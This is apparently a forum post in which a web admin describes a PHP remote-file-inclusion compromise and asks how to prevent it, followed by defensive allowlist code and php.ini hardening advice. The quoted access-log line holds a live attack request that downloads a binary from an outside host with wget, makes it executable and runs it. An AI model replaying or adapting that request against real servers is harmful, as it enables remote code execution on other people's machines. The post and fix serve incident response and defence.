poorly written PHP, code compromised.

Instead of me trying to explain it, let me show you the access log:

"GET /index.php?pg=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=cd%20/tmp;wget%20simol.com.br/bdsun;chmod%20777%20bdsun;./bdsun HTTP/1.1

Obviously this bdsun file was downloaded and run on my web server. It, along with a file called "fsun", basically bogged our whole network down. I'm glad that I caught it before people really noticed.

First off, does anybody know what this is? I did a quick search on Google and couldn't find anything.

Secondly, this user had register_globals turned on, which obviously I turned off, and now I've made him change to using either _POST, _GET or _REQUEST to get the variables.

The way the site is set up, you link to index.php?pg=page.html to show that page. Change page.html to whatever page he has on the server. A basic template-type engine, if you will.

Will shutting off register_globals for this user and making him use _POST, _GET or _REQUEST keep this from happening again? Or should I make him stop doing pages that way? Does anybody know a good variable checker to make sure that malicious code isn't entered this way?
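Added example, not code from the original post or the site in question: the `index.php?pg=...` template pattern described above, rewritten so the page name can never point at a remote URL or outside the template directory. Turning off register_globals alone does not fix this, because an `include($_GET['pg'])` still fetches whatever `pg` names; the fix is to never include a user-chosen path at all. Assumes pages live in a `pages/` directory next to `index.php` and are referenced by bare name (the `.html` is added server-side); `PAGE_DIR`, `$allowed_pages` and `load_page()` are names made up for this example.

```php
<?php
// Reference: the pattern that got the server compromised, shown only as a comment.
//   include($_GET['pg']);   // or include($pg) with register_globals on
// Either form lets the request pick an arbitrary local file or, with
// allow_url_fopen/allow_url_include on, a remote script such as hkz.txt.

define('PAGE_DIR', __DIR__ . '/pages');   // assumption: templates live here

// Explicit allowlist: the only page names the template engine will render.
$allowed_pages = array('home', 'about', 'contact');

function load_page($requested, array $allowed)
{
    // 1. Accept only a bare page name: letters, digits, dash, underscore.
    //    This rejects "http://...", "../", "?", "%00" and similar outright.
    if (!is_string($requested) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        return false;
    }
    // 2. The name must be one the site owner explicitly published.
    if (!in_array($requested, $allowed, true)) {
        return false;
    }
    // 3. Resolve the real path and confirm it is still inside PAGE_DIR.
    $path = realpath(PAGE_DIR . '/' . $requested . '.html');
    $base = realpath(PAGE_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    // 4. Return the file as content. It is never passed to include(), so even a
    //    file containing PHP is echoed as text rather than executed.
    return file_get_contents($path);
}

$pg   = isset($_GET['pg']) ? $_GET['pg'] : 'home';
$body = load_page($pg, $allowed_pages);

if ($body === false) {
    // Log the rejected request (non-printable bytes replaced) so attempts like
    // the one in the access log above are visible without grepping Apache logs.
    $safe = preg_replace('/[^\x20-\x7e]/', '?', substr((string) $pg, 0, 200));
    error_log('template: rejected page request: ' . $safe);
    header('HTTP/1.0 404 Not Found');
    $body = '<p>Page not found.</p>';
}
echo $body;
```

In php.ini, also set `allow_url_include = Off` (PHP 5.2 and later) and, unless the site needs remote fopen for something else, `allow_url_fopen = Off`, so that include() cannot fetch a URL even if some other script on the box still passes user input to it.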
